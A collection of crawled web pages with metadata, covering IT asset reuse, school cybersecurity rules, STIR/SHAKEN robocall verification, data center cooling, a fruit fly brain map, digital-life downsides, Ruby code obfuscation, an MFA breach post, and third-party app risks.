2024-09-13T12:09:00Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651513.89/warc/CC-MAIN-20240913101949-20240913131949-00876.warc.gz
en
0.96143
3,271
2.703125
3
Before you recycle your old devices responsibly, you should consider reuse and repair! Your old IT assets may still have remaining useful life, and these processes can provide monetary value for your organization as well as positive, sustainable practices for our planet. Read below for the importance of reuse and repair.

The Importance of Reuse
Reuse offers the opportunity to extend the life of a device. Instead of throwing away your devices or recycling them right away, they can be reused and redeployed, either within your organization or by another. Full-service ITAD companies can provide redeployment and remarketing options. Reuse ensures maximum value for IT assets while minimizing the amount of electronic waste that ends up in our landfills.

The Importance of Repair
Repair provides a life extension for devices that are not operating properly. This can be as simple as replacing a hard drive, battery, or processor. Some ITAD companies can provide repair services or purchase your devices to use for parts to repair other systems. Repair can save you the cost of buying a new device, and it also contributes to minimizing electronic waste.

Reuse & Repair with Lifespan
Lifespan is a strong believer in the reuse and repair philosophy. This is outlined by our value back & recovery program and our membership in the Right to Repair Association. By extending the life of a device, you can save costs for your organization and reduce the amount of electronic waste produced each year. Do you want to build a better planet and a brighter future? Schedule a call with one of our experts to get started.
<urn:uuid:e5d12830-fc89-469c-98de-900b5fb1a84f>
CC-MAIN-2024-38
https://www.lifespantechnology.com/the-importance-of-reuse-and-repair%EF%BF%BC/
2024-09-13T11:06:16Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651513.89/warc/CC-MAIN-20240913101949-20240913131949-00876.warc.gz
en
0.938517
326
2.640625
3
As schools further implement the use of technology in the classroom, educators need to make sure that they're taking the necessary precautions to keep that technology secure. Cyber threats are a real danger, and schools need to take steps to protect themselves from those cyber risks. One way to do that is by developing basic classroom technology rules. Schools are responsible for keeping both staff and students safe from cyber attacks. In order to do that, they need to have measures in place to protect themselves from cyber threats. There has been an 18% increase in cyber attacks targeting schools since 2019. Establishing classroom technology rules will help reduce the number of successful attacks threatening schools. In this blog, we'll discuss some classroom technology rules that your school can implement in order to stay protected from cyber threats.

Protecting Your Classroom With Basic Cybersecurity Rules
One of the most important things schools can do to protect themselves is to be aware of the cybersecurity threats specifically targeting the education sector so they can be prepared. There are a few rules to follow to keep your school prepared and protected from cyber criminals:
- Install antivirus software on all devices and keep it up-to-date – Antivirus software helps protect your computers from viruses. Install antivirus software on all devices and then keep that software up-to-date. Antivirus software companies release new virus definitions regularly, and these definitions are what help the software detect and remove viruses from your computer.
- Implement a Password Policy for All Connected Devices – One of the most important classroom technology rules to follow is to keep devices password protected. If devices aren't password protected, anyone who has access to them can view your files, install software, or change your settings. This can make your device vulnerable to cyber attacks.
- Only allow authorized personnel to install software on devices – When it comes to installing software on school devices, you should only allow authorized personnel to do so. Installing software can change the settings on a device and make it vulnerable to cyber attacks. By limiting software installation to authorized personnel, schools can help reduce the risk of cyber attacks.
- Educate staff and students about cybersecurity threats and how to protect themselves – It's essential to educate both staff and students about the dangers of cyber attacks. Staff need to be aware of the dangers so they can protect themselves and their students, and students need to learn how to protect themselves from cyber threats. One available resource for recognizing and preventing cyberattacks is security awareness training with Hook Security. Phishing training that is easily digestible and informative helps students and staff learn about phishing and the importance of device and internet safety.
- Create security policies governing acceptable use of technology in the classroom – Creating policies for acceptable use of technology in the classroom protects schools and users from cyber threats. Schools can help reduce the number of successful attacks threatening their systems when policies are developed. By having policies in place, it will be easier to enforce the rules and take action if they're broken. If you don't have policies in place, it's more difficult to take action against someone who breaks the rules because there's no clear guidance on what is and isn't allowed.
- Implement a Bring Your Own Device (BYOD) policy – With BYOD, students and staff are allowed to bring their personal devices to school and use them for educational purposes. One of the biggest risks is that personal devices are generally less secure than school-issued devices. Schools should implement a BYOD policy that outlines the expectations and rules for using personal devices on the school network.
- Regularly back up data – A simple yet crucial classroom technology rule to follow is to regularly back up your data. This helps protect you from losing your data in the event of hardware failure, a natural disaster, or a cyber attack. It is also a best practice to regularly test the backed-up data to ensure it is usable in case you need it.
- Deploy a Zero Trust Network – Aruba Networks, for example, has built-in Zero Trust and SASE security that ensures the same access controls applied to campus or branch networks also extend to the home or remote worker across wired, wireless, and WAN connections.

Partner with ANC Group for Secure Classroom Technology
We understand that not all schools have the same resources available to them. However, implementing even a few of these classroom technology rules will help to better protect your school from cyber threats. ANC Group is available to protect your school using the tools and techniques that are the most effective. We'll help you decide which network products will work best for your school, and customize options based on your specific needs. Act now and get a free technology assessment with our team of experts.
<urn:uuid:99f853ab-e618-4ea1-acce-7fa735101403>
CC-MAIN-2024-38
https://ancgroup.com/8-classroom-technology-rules-every-school-should-implement/
2024-09-14T17:10:02Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.73/warc/CC-MAIN-20240914161327-20240914191327-00776.warc.gz
en
0.952058
976
3.671875
4
The motherboard is the backbone of a computer, a key component that connects all other parts, allowing them to communicate and work together. It is a large circuit board that houses the CPU, memory, and connectors for other peripherals. The CPU, or Central Processing Unit, is often called the computer's brain, performing calculations and running programs. Together, they form the core of computer operations, with the motherboard providing the necessary pathways for data and the CPU executing instructions to carry out tasks. The motherboard and CPU rely on each other to function effectively. The motherboard ensures power is distributed properly, expansion cards are connected, and the BIOS is accessible, while the CPU carries out the commands that make your computer do everything from browsing the internet to playing games. Without the motherboard's infrastructure, the CPU would have no way to interact with other components, and without the CPU's processing power, the motherboard would be lifeless.
<urn:uuid:d3e0fe2e-1dcb-4731-927b-122a107beb72>
CC-MAIN-2024-38
https://mile2.com/forums/reply/94760/
2024-09-14T17:36:21Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.73/warc/CC-MAIN-20240914161327-20240914191327-00776.warc.gz
en
0.945148
190
3.921875
4
Everything you need to know about STIR/SHAKEN
Fraudulent calls have been around for a long time; however, due to robocalling technology, the number of fraudulent calls is rising each year. So what is robocalling exactly? A robotic call, or robocall, is a phone call that is automatically placed by a computer. The computer has a list of numbers to dial, and the moment you answer it will either connect you to an agent or play a pre-recorded message. These systems can dial multiple recipients at the same time, making robocalling a relatively inexpensive method to use. Though robocalls can be legitimate – they are still used for weather alerts, political campaign messages, broadcasts from essential services and more – this technology is also used for fraudulent purposes, and that number is rising. Today more than 40% of the robocalls made are fraudulent.

Caller ID Spoofing
Most fraudulent calls display a number that is altered to spoof those of legitimate organizations, increasing the chance that victims answer the call. Victims think that it was the police, a delivery firm or their bank that was trying to contact them.

Fraudulent Robocall Warning Signs
- You receive an automated sales call from a company you have not given consent to contact you.
- A prerecorded message tells you to press "1" or some other key to be taken off a call list.
- The message offers you goods or services for free or at a suspiciously deep discount.
- The message says you owe back taxes or unpaid bills and face legal or financial consequences if you don't pay immediately.
- The message says you've won a big lottery or sweepstakes prize and tells you to press a key or call a number to claim it.
If you receive these calls, hang up and do not press any keys. If the robocall claims to be from, say, your bank, look up the bank's phone number online, call, and ask if they contacted you.

In response to the growing number of fraudulent calls, the FCC has adopted rules requiring service providers to deploy a STIR/SHAKEN solution by June 30, 2021. STIR/SHAKEN is a technology framework designed to reduce fraudulent robocalls and illegal phone number spoofing. STIR stands for Secure Telephone Identity Revisited. SHAKEN stands for Secure Handling of Asserted information using toKENs. Many carriers and service providers have created tools to identify and block fraudulent calls. Unfortunately, these tools aren't perfect. Sometimes legitimate calls are incorrectly marked as "SPAM LIKELY", "SPAM RISK" or "SCAM LIKELY". If your phone number is incorrectly marked as spam or blocked, read here what you can do about it. Are you still confused and want to learn more about STIR/SHAKEN and what Dynamix is doing to combat call fraud? Schedule a call with one of our experts to get your STIR/SHAKEN questions answered.
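For readers curious what SHAKEN looks like on the wire: the originating provider signs a small token called a PASSporT (an ES256-signed JWT carried in the SIP Identity header), and the terminating provider verifies it before deciding how much to trust the caller ID. The snippet below is a rough illustration of that verification step only, not production code: the token and public key are placeholders, it assumes the PyJWT library is installed, and a real verifier would also fetch the certificate referenced in the `x5u` header and validate its chain against the approved STIR/SHAKEN certificate authorities.

```python
import jwt  # PyJWT; assumed installed via: pip install "pyjwt[crypto]"

def verify_passport(identity_token: str, provider_public_key_pem: str) -> dict:
    """Decode and check a SHAKEN PASSporT (an ES256-signed JWT).

    identity_token is assumed to be the bare JWT extracted from the
    SIP Identity header; the key is the signing provider's public key.
    """
    header = jwt.get_unverified_header(identity_token)
    # x5u points at the signing provider's certificate; a full verifier
    # downloads it and checks the chain of trust before trusting the key.
    cert_url = header.get("x5u")

    claims = jwt.decode(identity_token, provider_public_key_pem,
                        algorithms=["ES256"])
    # "attest" is A, B or C: full, partial or gateway attestation.
    print(f"certificate: {cert_url}")
    print(f"attestation: {claims.get('attest')}, "
          f"calling number: {claims.get('orig', {}).get('tn')}")
    return claims
```

The attestation level (A, B or C) is what downstream analytics engines combine with other signals when deciding whether to label a call as spam, which is also why legitimate calls can still occasionally be mislabeled.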
<urn:uuid:aca867ca-7c1e-491c-a6be-d23073c85b6e>
CC-MAIN-2024-38
https://www.dynamixcloud.com/blog/everything-you-need-to-know-about-stir-shaken/
2024-09-14T18:36:36Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.73/warc/CC-MAIN-20240914161327-20240914191327-00776.warc.gz
en
0.935872
629
2.796875
3
Word tables are powerful, flexible and fully customizable. This video will help you learn how to use tables to your advantage. It will also give you new ideas and maybe solve some problems as well. The Ultimate Guide is a comprehensive guide to using tables in Microsoft Word. It covers all aspects of working with tables in Word, from creating and formatting them to manipulating data within them. This guide also explains how to use features such as sorting, filtering, conditional formatting and other advanced features available when working with tables. Additionally, it provides best practices for ensuring that your documents look great and are easy to read while still providing the necessary information. Finally, this guide offers advice on troubleshooting common issues related to working with tables in Word. How to Format Microsoft Word Tables Using Table Styles (Ultimate Guide): the Table Styles menu for formatting tables in Microsoft Word.
<urn:uuid:0a9f9d73-1ba5-4ba3-a0ed-784c75771af3>
CC-MAIN-2024-38
https://www.hubsite365.com/en-ww/crm-pages/word-tables-best-practices-2023-the-ultimate-guide.htm
2024-09-20T23:05:33Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701425385.95/warc/CC-MAIN-20240920222945-20240921012945-00276.warc.gz
en
0.897083
172
2.8125
3
Emerging technologies, trends, and opportunities are impacting the way data centers perform the urgent, and often challenging, task of cooling their servers and other network equipment to minimize PUE and satisfy upper management at the same time. The investment in data center cooling can be significant, and the responsibility is daunting. It’s a rare operation of any kind that isn’t wholly dependent on its data management foundation, and overheating, which can occur in a swiftly escalating domino effect at a second’s notice, can bring an entire global operation to a halt, stranding and impacting the productive time of hundreds or thousands of users. The demand for data storage and usage was growing at a fast clip when COVID-19 dramatically changed everything, including the way we work, and the sudden increase in people working remotely rapidly escalated digital demand to record-high levels. And, even as the world returns to a more normal state, a reduction to prior levels of remote demand is unlikely. Lowering Cooling Costs Most commonly, the cooling strategy of choice for many data centers is similar to what has been used for decades — generating cool air to lower ambient temperatures using chilled, water-based CRAHs or CRACs. Yet, the technologies and methodologies to do so have progressed significantly in multiple directions. For example, the cool air is often better focused, brought closer and closer to where it is needed — from the room to the row to the racks — to increase efficiency. Over the years, computers and servers have become more tolerant of higher temperatures; thus, the equipment doesn’t have to always be kept in the “human comfort zone" to maintain effective operation. In order for the cooling system to fully benefit from this change, the HVAC equipment must be able to generate higher leaving water set points. Some traditional chiller technologies, such as screw compressors, are not able to do this effectively. New computer equipment designs can operate at higher space temperatures, enabling chillers to generate leaving water temperatures as high as 82ºF, reducing compressor power consumption and helping data centers reduce operating costs. Additional technologies, such as oil-free compressors, may be introduced as well in order to realize the full benefits of this type of system. This new chiller application capability is better enabled by the advent of oil-free compressors, which do not require oil for lubrication because the motor shaft levitates in a magnetic field. In addition to potentially providing several efficiency gains and reducing energy costs, this technology can also potentially reduce maintenance costs for data centers. For example, there is no need to periodically change the compressor oil and oil filter, and there is no mechanical wear to the system since there is no metal-to-metal contact. Operations using oil-free compressors can reduce their maintenance costs some 30% or more over those using traditional fixed-speed positive displacement compressors. Another advantage of oil-free compressors is that because oil and mechanical wear have been eliminated, the performance remains consistent over time. Often, companies look to improve their energy performance for environmental and/or financial reasons and are delighted by the reduction in carbon footprint that often moves in lockstep with reducing energy consumption. With an average annualized PUE of 1.57, data center losses are currently adding about 60% to the energy use of IT. 
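To put that PUE figure in concrete terms: PUE is total facility energy divided by IT equipment energy, so everything above 1.0 is cooling, power distribution and other overhead. The quick sketch below illustrates the arithmetic; the IT load value is an arbitrary example, not a figure from this article.

```python
def facility_energy(it_energy_kwh, pue):
    """Return (total facility energy, overhead energy) for a given PUE.

    PUE = total facility energy / IT equipment energy, so the overhead
    fraction on top of the IT load is simply PUE - 1.
    """
    total = it_energy_kwh * pue
    overhead = total - it_energy_kwh
    return total, overhead

it_load = 1_000_000  # assumed annual IT consumption in kWh, for illustration only
for pue in (1.57, 1.30):
    total, overhead = facility_energy(it_load, pue)
    print(f"PUE {pue}: overhead adds {overhead / it_load:.0%} "
          f"({overhead:,.0f} kWh) on top of the IT load")
```

At a PUE of 1.57 the overhead works out to 57%, consistent with the "about 60%" figure above, while a 1.3 design cuts that to 30%.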
And, while more new builds are designed with PUEs of 1.3 or less, it is not economically or technically feasible for many operators to perform the major overhauls needed for better efficiency in many older facilities. However, there are easy gains to be had from better airflow management, optimized controls, and equipment replacement. Further improvements might require significant change, such as retrofits with highly efficient cooling systems. Similarly, a move to different compressor technology often allows a move to a more environmentally benign refrigerant. For example, most screw and centrifugal compressors today use R-134a, which has a global warming potential (GWP) of 1,400. Oil-free compressors can be used with several refrigerants, including low-GWP R-513A and R-515B or ultralow-GWP HFO-1234ze. Another recent innovation takes the idea of focusing cooling closer to the heat to its logical conclusion and utilizes a cold plate placed on the server that's connected to a chilled water loop that carries the heat outside. Another alternative design concept involves specially designed servers submerged in dielectric cooling fluid that rejects heat directly from the server to the fluid. Moving Beyond PUE Data center HVAC systems have long been managed as a cost center with a focus on continually reducing the operating costs through various efficiency improvements. However, many companies today are benefitting from an emerging solution that replaces the cost model with an entirely new paradigm — removed heat is not dissipated into the air but is instead recovered and sold as a valuable commodity to those who need it at the time. Considering how much energy is spent to heat buildings from scratch, this is obviously a need waiting to be filled — especially in colder and temperate climates. The general concept is familiar to many industries. In fact, many industrial plants use their waste heat in a cogeneration model, where heat removed from a process is disseminated to another area of the facility that demands heat. This reduces the amount of energy that must be otherwise generated or purchased from utility providers. Data centers produce heat 24/7, making them a de-facto reliably consistent “generator.” Once that paradigm shift is made, there are some upfront infrastructure costs, but the concept can pay for itself and become a profit center fairly quickly based on recent demonstration projects. If the data center is close to a district heating infrastructure, which collects and generates heat for dispersion to a nearby campus or even to an entire municipality, the supply infrastructure is ready-made. But, it can also be cost-effective to create a new grid around many campus-like facilities, such as colleges or business parks, where heat must be provided to many adjacent rooms and buildings. Hyperscale and enterprise companies, with their mega-scale facilities, especially have the flexibility to locate in northern climates, which they have been doing the last several years, creating the heat recovery scale needed for these district heating systems. The higher data center operating temperatures also means the heat pumps applied to maintain cooling while also recovering heat operate at optimal efficiency, lowering the resulting heat price and justifying base-loading the heat source. Additionally, on-site backup power means a constant supply of recovered heat under demand response or other power interruption scenarios. 
Oil-free compressors can help with this shift through recent advances that have expanded the operating map to support heating applications. High-lift, oil-free compressors have the ability to generate higher leaving water temperature for use in heating applications, which, in the past, have commonly used traditional oil-lubricated, positive displacement compressors. Using oil-free compressors for this application brings the benefits of reduced maintenance and no performance degradation over the life of the compressor. In this model, the HVAC system becomes a revenue-generator for the enterprise and can ultimately provide an energy source that would otherwise be wasted if released into the atmosphere. Finally, this model can go a long way for companies looking to reduce their carbon footprints and contribute toward their decarbonization and net-zero emissions goals.
<urn:uuid:9218617b-795f-416f-ad52-4c62e06a5404>
CC-MAIN-2024-38
https://www.missioncriticalmagazine.com/articles/93891-cool-technologies-trends-and-opportunities
2024-09-08T18:59:47Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651017.43/warc/CC-MAIN-20240908181815-20240908211815-00476.warc.gz
en
0.950034
1,513
2.75
3
Researchers understand the structure of brains and have mapped them out in some detail, but they still don't know exactly how they process data – for that, a detailed "circuit map" of the brain is needed. Now, scientists have created just such a map for the most advanced creature yet: a fruit fly larva. Called a connectome, it diagrams the insect's 3,016 neurons and 548,000 synapses, Neuroscience News has reported. The map will help researchers better understand how the brains of both insects and animals control behavior, learning, body functions and more. The work may even inspire improved AI networks. "Up until this point, we've not seen the structure of any brain except of the roundworm C. elegans, the tadpole of a low chordate, and the larva of a marine annelid, all of which have several hundred neurons," said professor Marta Zlatic from the MRC Laboratory of Molecular Biology. "This means neuroscience has been mostly operating without circuit maps. Without knowing the structure of a brain, we're guessing on the way computations are implemented. But now, we can start gaining a mechanistic understanding of how the brain works." To build the map, the team scanned thousands of slices of the larva's brain with an electron microscope, then integrated those into a detailed map, annotating all the neural connections. From there, they used computational tools to identify likely information flow pathways and types of "circuit motifs" in the insect's brain. They even noticed that some structural features closely resembled state-of-the-art deep learning architectures. Scientists have made detailed maps of the brain of the adult fruit fly, which is far more complex than a fruit fly larva; however, these maps don't include all the detailed connections required for a true circuit map of the brain. As a next step, the team will investigate the structures used for behavioural functions like learning and decision making, and examine connectome activity while the insect performs specific activities. And while a fruit fly larva is a simple insect, the researchers expect to see similar patterns in other animals. "In the same way that genes are conserved across the animal kingdom, I think that the basic circuit motifs that implement these fundamental behaviours will also be conserved," said Zlatic.
<urn:uuid:0f772ee1-a3bb-4bcd-91af-09147d9f53dd>
CC-MAIN-2024-38
https://www.akibia.com/scientists-create-the-most-complex-map-yet-of-an-insect-brains-wiring/
2024-09-11T06:05:54Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651344.44/warc/CC-MAIN-20240911052223-20240911082223-00276.warc.gz
en
0.930534
502
3.65625
4
Owning a pocket-fitted supercomputer is an advantage that would make our ancestors envious to the bone. There are two sides to the coin, however: 21st-century tech is made to help us do things, with little attention to the effects it has on our mental health. It's almost redundant to proclaim that social media affects our daily lives. Virtually impossible to escape, various media platforms plague our daily lives, be it our work, leisure, or reaching out to loved ones. Billions of people started the last decade with playful tags such as 'YOLO' (you only live once), unaware that the next decade would be marked by four letters with a more somber meaning – 'FOMO', or fear of missing out. FOMO describes the feeling of worry or anxiety that you are missing out on an exciting experience and that others may lead a better life than you do – the sense most of us get after seeing photos of vacationing friends while stuck in our daily routines, made ever more mundane over the aeons of self-isolation. Fear of missing out is not a new phenomenon and is closely related to the individual need to be satisfied with our competence, autonomy, and relatedness. Social media, however, amplifies FOMO with 'highlight reels', variously named on different social media sites. Continuously comparing ourselves to others may impact our self-esteem and even conjure a feeling of hopelessness. Studies show that to avoid FOMO, people feel pressured to be constantly available and to seek new connections, abandoning present ones. Unsurprisingly, the result is a heightened sense of isolation.

The goldfish effect
Unsurprisingly, with uninterrupted access to the web, people tend to rely on smartphones for information – so much so that easy access to vast troves of information can overload our senses. That causes our brains to store information poorly, leads to fatigue, and affects our attention span. A National Center for Biotechnology Information study in the US showed that the average human attention span had dropped from 12 seconds in 2000 to eight seconds in 2013. Since attention span in young kids is shown to predict their math and reading abilities later in life, a shortening attention span can cause long-term problems whose effects we don't yet know.

Living in a world where news spreads faster than wildfire has its drawbacks. It makes little difference whether the information being distributed is true or not, and so a worrying amount of fake news circulates online. Even if we set aside the political ramifications spreading lies has on societies globally, the coronavirus pandemic has shown what damage online lies can do. Dubbed an 'infodemic' by the World Health Organization (WHO), it has taken hundreds of lives globally. A study published in the American Journal of Tropical Medicine and Hygiene showed that misinformation on COVID-19 killed at least 800 people, with 5,800 hospitalized.

With all things digital embedded in our daily lives, concerns about our safety online become a part of our existence. Predictably, constant fear of personal details leaking online is a cause of anxiety, as a recent study on data privacy shows. Even with our data well secured, there are ways threat actors employ artificial intelligence to create deepfake pictures to shame and blackmail people. For example, a 2019 report on deepfakes by Sensity, an Amsterdam-based visual threat intelligence company, found that the vast majority of deepfakes online are used for porn.
Moreover, a report by UCL, published in August 2020, claims that fake audio and video content used for extortion is among the top crimes of the future – and one that is already beginning now. There are even cases where AI-powered voice generators were used to steal hundreds of thousands from unsuspecting victims.

With people using ever more password-protected accounts, anxiety over lost passwords is slowly creeping in to complement the other digital woes modern life is full of. A recent survey shows that a third of respondents feel that recovering a lost password can be as stressful as losing employment. Participants claim that owning multiple password-protected accounts can be tricky, since it's not easy to remember all the passwords. On the other hand, it's anxiety-inducing and unsafe to use the same password for different accounts. This April, the CyberNews investigation team analyzed over 15 billion passwords leaked in multiple data breaches. The research shows that the most common passwords are laughably easy to crack, with all-time hits like '123456' topping the list. There are much better ways to create a strong password – for example, making up a unique phrase and applying various symbols for a stronger effect. The best way, however, would be to use a password manager, a tool that helps to create strong passwords you don't even have to remember. Take a look at our team's list of the best free password managers if you're interested.
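As an illustration of the "unique phrase plus symbols" advice, and of why generated secrets beat memorable-but-guessable strings, here is a minimal sketch using Python's standard secrets module. It is only an example: the short word list is a stand-in for a proper diceware-style list of several thousand words, and in practice a password manager does this work for you.

```python
import secrets
import string

# Stand-in word list; a real passphrase generator would draw from a large
# curated list (e.g. a diceware list of several thousand words).
WORDS = ["coffee", "harbor", "violet", "cactus", "meteor", "ribbon",
         "walrus", "pocket", "lantern", "quarry", "saddle", "tundra"]

def passphrase(n_words: int = 4) -> str:
    """Random words joined with hyphens, plus a random digit and symbol."""
    words = [secrets.choice(WORDS) for _ in range(n_words)]
    suffix = secrets.choice(string.digits) + secrets.choice("!@#$%^&*")
    return "-".join(words) + suffix

def random_password(length: int = 16) -> str:
    """Fully random password for accounts stored in a password manager."""
    alphabet = string.ascii_letters + string.digits + "!@#$%^&*"
    return "".join(secrets.choice(alphabet) for _ in range(length))

print(passphrase())       # e.g. violet-walrus-coffee-quarry3!
print(random_password())  # e.g. q7LvRx2M!pT9sWk1
```

The passphrase style is easier to remember for the one or two passwords you must type from memory; the fully random style is what a manager should generate for everything else.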
<urn:uuid:96f5b1db-b0e3-4991-965a-34c70ba3db82>
CC-MAIN-2024-38
https://cybernews.com/news/digital-downsides-5-ways-technology-makes-our-lives-harder/
2024-09-14T20:42:54Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.74/warc/CC-MAIN-20240914193334-20240914223334-00876.warc.gz
en
0.936217
1,033
3.234375
3
Implementation of robust anti-reverse engineering protections

This code is a simple login function in a Ruby on Rails application. The function takes in parameters from the user input. When the user submits the login form, the function is called. It looks up the user by the submitted name. If a user with the submitted name is found and the submitted password is correct (checked by the model's password authentication method), the user's id is stored in the session (session[:user_id] = user.id) and the user is redirected to the root URL with a success message.

However, this code is vulnerable to reverse engineering because it does not implement any anti-reverse engineering protections. A sophisticated attacker could use reverse engineering tools and techniques to understand the login process, bypass the login function, or even extract sensitive data like user credentials. For instance, the password authentication is done directly in the controller, and the password is sent in plaintext from the client to the server, so it could be intercepted and reverse engineered. Moreover, sensitive operations like user authentication should not be implemented directly in the controller; they should be encapsulated in service objects or model methods, which would make it harder for an attacker to reverse engineer the authentication process. Lastly, the code does not implement any form of rate limiting or account lockout after a certain number of failed login attempts, which makes it easier for an attacker to perform a brute force attack by trying many different passwords until they find the correct one.

The updated code includes the use of the 'ruby-obfuscator' gem, a tool that obfuscates Ruby code to make it harder to reverse engineer. The obfuscation process transforms the code into an equivalent, but harder to understand, version. This makes it more difficult for attackers to understand the code's logic and find vulnerabilities. The 'ruby-obfuscator' gem is used to obfuscate the UsersController code, and the obfuscated code is then written back to the 'users_controller.rb' file. Please note that obfuscation is not a foolproof method of preventing reverse engineering. It is just one layer of security that can be used in conjunction with other methods such as code encryption, tamper detection, code signing, regular updates and patches, security assessments, penetration testing, and developer education. Also, remember to add 'ruby-obfuscator' to your Gemfile and run `bundle install` to ensure the gem is installed in your application.
<urn:uuid:0ee0ba41-bc16-45aa-b22c-6b325e4c88e9>
CC-MAIN-2024-38
https://help.fluidattacks.com/portal/en/kb/articles/criteria-fixes-ruby-376
2024-09-14T21:59:38Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.74/warc/CC-MAIN-20240914193334-20240914223334-00876.warc.gz
en
0.904489
505
3.359375
3
Duo Multi-Factor Authentication Breached: What Really Happened?

MFA is a security measure that is supposed to protect people from hackers; however, Russian hackers are now exploiting MFA deployments to compromise accounts and steal information. The use of MFA is becoming more and more popular because it's a way to protect your personal information from being hacked, yet attackers are now turning weaknesses around it against the very accounts it is meant to protect.

Duo is one of the leading multi-factor authentication services, providing two-factor authentication for online accounts, and it is used by many organizations to protect their data and accounts from hackers. Duo's protection was recently bypassed when an organization failed to remove a former employee's account that still had access to the company's systems. This allowed the hackers to completely bypass the MFA set on the account. This was not a vulnerability in the MFA provider itself; rather, a single inactive account allowed Russian hackers to access the company's data. The breach was discovered when Duo noticed unusual activity on their servers and investigated it further. A breach like this is a good example of why user account hygiene is so important, and why security patches need to go in as soon as is practical.

Multi-Factor Authentication Does Not Protect You From Everything
Multi-factor authentication provides stronger security than single-factor authentication, but it doesn't protect you from everything.
- MFA does not protect against malicious insiders. In the case of a malicious insider, they can use stolen credentials to access data on your network.
- MFA is not always mandatory. Some organizations are not required to use multi-factor authentication by law or policy.
- MFA is not always effective. If your computer has been infected with malware, the user will still have access even if they are using 2FA.
- MFA can be circumvented with physical access. With physical access, an attacker can bypass 2FA and gain unauthorized access to your network without any help from technology.
- MFA is only as strong as its weakest link. The weakest link in multi-factor authentication is the human factor. If an attacker gets close enough to a user, they can steal their access credentials and use them to access your environment.
- MFA has its own risks. Inherent weaknesses in multi-factor authentication systems can be exploited by an attacker.
- MFA could be bypassed by attackers. An attacker with physical access could install a device that captures data from the user's computer (given there is no biometric identification) and then use this data to impersonate the user and access protected services.

What are the Risks of Leaving Inactive Employee Accounts on Your Network?
In recent years, there has been a rise in the number of data breaches and data leaks. One of the most common causes of these breaches is former employee accounts that still have access to the company's information. A former employee account is a gold mine for hackers and cybercriminals: they can easily access personal information like emails and passwords that were used by former employees. It also leaves an open door for data theft if the company does not take precautions to remove it. It is important to remove inactive employee accounts because they are a security risk.
If an account has been inactive for more than 90 days, it can be hijacked by malicious users who can use it to access the company's data. With the number of employees on the rise, it is increasingly difficult for companies to keep track of all their employees and their personal information.

How Can Companies Remove Inactive Employee Accounts?
There are many ways companies can remove former employee accounts to avoid a data breach. One way is to have an automated system that removes inactive accounts automatically after a certain period of time (a minimal sketch of this idea follows below). Another way is to have a human-based process where administrators manually remove all the inactive accounts. Companies should consider these methods before they decide how they want their former employee accounts removed. Some companies have seen severe impacts in terms of financial loss, personal data misuse, and security breaches when their data is compromised. Here are 5 reasons to remove inactive employee accounts in order to prevent data breaches:
- Data breaches
- MFA hacks
- Security risk
- Employee retention and productivity
- Employee satisfaction
Companies should keep in mind that they are responsible for any damage caused by a data breach and should take measures to prevent it. Companies should establish a data breach response plan that includes how to report a breach, what information is to be disclosed, and how it will be protected. This plan should also include an emergency response team that can be reached at all times when there is a data breach.

Multi-Factor Authentication (MFA) is an important security technique that helps to protect your account from unauthorized access, but it is not a perfect solution. If you would like more information on how to secure your network and protect your business and livelihood from hackers, give us a call at (719) 439-0599.
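As a rough illustration of the automated approach mentioned above, the sketch below flags accounts with no sign-in for more than 90 days. It is deliberately generic: the account records are hard-coded stand-ins, and in a real environment the list would come from your directory service (Azure AD, Okta, on-premises AD, and so on) and the action would be to disable and review, not silently delete.

```python
from datetime import datetime, timedelta

INACTIVITY_LIMIT = timedelta(days=90)

# Stand-in data; in a real job these records would be pulled from the directory.
accounts = [
    {"user": "alice",      "last_sign_in": datetime(2024, 8, 30)},
    {"user": "bob",        "last_sign_in": datetime(2024, 1, 12)},  # former employee
    {"user": "svc-backup", "last_sign_in": datetime(2023, 11, 2)},
]

def stale_accounts(accounts, now=None):
    """Return accounts whose last sign-in is older than the inactivity limit."""
    now = now or datetime.utcnow()
    return [a for a in accounts if now - a["last_sign_in"] > INACTIVITY_LIMIT]

for account in stale_accounts(accounts, now=datetime(2024, 9, 14)):
    # Disable first and confirm with HR/IT before deleting outright.
    print(f"Flag for review: {account['user']} "
          f"(last sign-in {account['last_sign_in']:%Y-%m-%d})")
```

Run on a schedule and wired to your directory's sign-in logs, a job like this turns "we forgot about that account" into a routine report instead of a breach post-mortem.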
<urn:uuid:747facac-1f66-40ad-85be-2d7fd966ea44>
CC-MAIN-2024-38
https://www.coloradosupport.com/duo-multi-factor-authentication-breached/
2024-09-14T20:46:18Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651580.74/warc/CC-MAIN-20240914193334-20240914223334-00876.warc.gz
en
0.957887
1,094
2.65625
3
It is easy to overlook the risks of third-party apps. You see a cool app and install it on your phone. You see the prompt asking you for permissions. It is not clear what the app wants to access or why, but you want the app, so you click "Grant" or "Allow" and away you go. Some third party now has access to your contacts, your schedule, and maybe even your files. Whether mobile apps, browser extensions, or freemium apps, your user community is installing apps and tools and granting access to your data. And while most apps are harmless and well-behaved, one rogue app can be a disaster.

The Hidden Dangers of Third-Party Apps
Not every app, and not every app provider, is trustworthy. And since most apps need access to some of your data in order to function, permissions should not be granted without some forethought. Preventing individual users from installing apps and granting permissions, however, is nearly impossible. Most small and midsize organizations have neither the money nor the resources to micromanage browsers and mobile devices – especially in our BYOD world. Using third-party apps can come with certain risks, and it's important to be aware of them before installing and using such applications. Here are some common risks associated with third-party apps:
- Security and Malware: Third-party apps may pose security risks as they are not subject to the same level of scrutiny and oversight as apps available on official app stores. Some third-party apps may contain malware, spyware, or other malicious code that can compromise your device's security and steal personal information.
- Data Privacy: Third-party apps may collect and misuse your personal data without your knowledge or consent. These apps may access sensitive information stored on your device, track your online activities, or share your data with third parties for targeted advertising or other purposes. This makes a good case for implementing proper data protection and security measures.
